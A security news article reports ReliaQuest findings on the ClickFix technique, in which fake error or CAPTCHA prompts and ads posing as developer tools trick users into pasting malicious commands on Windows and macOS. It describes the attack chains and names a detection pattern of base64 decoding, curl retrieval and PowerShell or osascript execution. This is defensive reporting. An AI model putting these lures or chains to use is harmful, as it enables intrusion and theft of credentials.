In the span of just two years, ClickFix has gone from an emerging social engineering technique to the overwhelming favorite among threat actors for malware delivery.

That’s according to research from ReliaQuest, which analyzed threat activity from March 1 to May 31 and found that ClickFix dominated initial access and defense-evasion categories. ClickFix, a social engineering tactic first observed in 2024, tricks targeted individuals into copying and pasting malicious commands into system dialogs like Windows Terminal.

Attackers achieve this by presenting targets with error messages or verification prompts like CAPTCHA requests, which include text-based commands to “fix” whatever the issue is. This approach bypasses traditional file scanning and email-based defenses, ReliaQuest noted.

Over the past two years, several variants of the technique have emerged, including “CrashFix,” which continually crashes users’ browsers and presents malicious commands as a remedy, and some that weaponize AI models through search engine optimization (SEO) poisoning

Related:NIST Enrichment Reductions Impact CVE Coverage, Accuracy

ReliaQuest found not only a rise in ClickFix attacks during the three-month period but also an expansion of the technique to macOS. “This means ClickFix can no longer be handled as a special case,” Raigridas Bartkus, cybersecurity specialist at ReliaQuest, wrote in the blog post. “Training, detection, and triage for it should run continuously on both Windows and macOS.”

ClickFix Attackers Go “Atomic” With Obfuscation 

ReliaQuest researchers observed ClickFix activity on macOS systems for the first time, with the clearest example being attacks that featured the Atomic macOS Stealer, also known as AMOS. While ClickFix activity on macOS has been observed before, Bartkus said threat actors deploying AMOS in recent months shifted away from baiting victims with fake versions of pirated or cracked software.

“This period, they switched to an applescript:// link that automatically opens Script Editor, a scripting app built into macOS, and runs the attacker’s commands there,” he wrote. “The change was likely designed to bypass the warning Apple added in macOS 26.4 that appears when users paste commands into the Terminal command-line app, a warning that isn’t triggered by Script Editor.”

This means security teams need to defend macOS systems with “the same monitoring and response coverage as Windows,” Bartkus wrote.

ReliaQuest’s report also noted that ClickFix attacks drove nearly 28% of defense-evasion activity in the three-month period through command and file obfuscation techniques. The cybersecurity vendor highlighted a specific ClickFix loader designed to deliver “Deepload” malware. Bartkus said the loader likely uses AI-generated obfuscation to hide the malware’s logic under thousands of variable assignments designed to look like routine scripting.

Related:Vulnerabilities Expose Private Data in Indian Government Systems

“This helps attackers produce new variants faster and reduces defenders’ time to adapt signatures,” he added.

ClickFix Attackers Targeting Developers

One notable trend that ReliaQuest observed was that ClickFix activity appeared to shift from delivery via compromised websites to emailed links instead. It’s unclear why this shift occurred, though Bartkus noted that it theoretically favors defenders because “emailed lures must pass through the mail pipeline, where gateways, link rewriting, and sandboxing can stop them before the click.”

Despite that shift, ReliaQuest observed attackers using a variety of effective ClickFix vectors to gain initial access. For example, traditional fake CAPTCHA and verification prompts remained active on Windows, while researchers also observed phony software installation guides targeting macOS users, a company spokesperson says.

ReliaQuest also saw malvertising campaigns via Google Ads that masqueraded as developer tools, most commonly “claude code install” and “homebrew install.” When an individual clicks on a sponsored search result, the fake installation page presents an error lure and instructs them to copy and paste a malicious command. 

Related:Security Community Slams US Ban on Exporting Mythos, Fable

“The developer-targeted malvertising stands out as the highest-risk variant given the population it reaches,” the ReliaQuest spokesperson tells Dark Reading. “In multiple confirmed cases, we found exposed npm and Bitbucket tokens in process environment variables on compromised hosts, which tells you the targeting is landing on exactly the right users.”

The spokesperson also notes that ClickFix is starting to look less like a one-time delivery mechanism and more like a launchpad for modular post-exploitation. ReliaQuest observed several instances where threat actors used a single pasted command to conduct domain enumeration and establish persistent access without ever dropping malware. 

To defend again such attacks, Bartkus recommended that organizations train users on both Windows and macOS to refrain from pasting commands into Run, Terminal, or Script Editor, and simulate ClickFix lures so that employees are familiar with the threat. 

Another option is to restrict users’ access to Run, Terminal, and Script Editor, which is a reasonable step for the average employee, the spokesperson says. But that approach isn’t feasible for everyone: “For developers and technical staff, blocking these tools outright would cause too much friction. These are core workflow tools and people will find workarounds. The better approach is to log and alert rather than block.”

The spokesperson added, “Monitoring for activity such as a sequence of base64 decoding, curl retrieval, and PowerShell or osascript execution, for example, would represent reliably anomalous behavior in developer environments.





Source link

#

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *